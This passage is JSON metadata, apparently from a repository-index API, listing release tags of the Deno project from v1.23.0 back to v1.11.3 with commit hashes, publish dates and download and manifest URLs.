v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v